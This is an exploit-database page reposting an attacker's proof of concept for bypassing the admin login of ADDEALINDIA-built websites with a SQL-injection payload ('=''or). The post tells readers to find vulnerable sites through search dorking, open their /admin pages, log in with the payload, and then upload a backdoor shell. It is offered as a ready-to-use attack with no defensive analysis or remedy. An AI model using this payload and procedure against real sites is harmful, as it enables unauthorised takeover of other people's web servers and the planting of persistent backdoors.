Advertisement






ADDEALINDIA Vulnerabelity Bypass Login Admin

CVE Category Price Severity
Not specified CWE-284: Improper Access Control Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2021-02-04
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020008

Below is a copy:

ADDEALINDIA Vulnerabelity Bypass Login Admin
# Exploit Title : ADDEALINDIA Vulnerabelity Bypass Login Admin
# Author Nick : Div007
# Date : 02-01-2021
# Greetz : Klaten Ghost | BLACK CODER ANONYMOUS [BCA-X666X] | RETURN OF BL4CKH4MM3R [ROBH]
# Blog : https://www.klaten-ghost.my.id/

#################################
[**] Exploit/PoC :

Payload :
Username/Password : '=''or

First dorking, select a site, then add / admin behind the site, for example: site.com/admin
enter username / password: '=' 'or. If your login is successful you will be taken to the admin panel [dashbosrd admin]
You know what to do when on the dashboard, you can upload the backdoor shell: D

#################################

[**] Contact : 
Gmail : [email protected]
Instagram : radivahmadg_

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum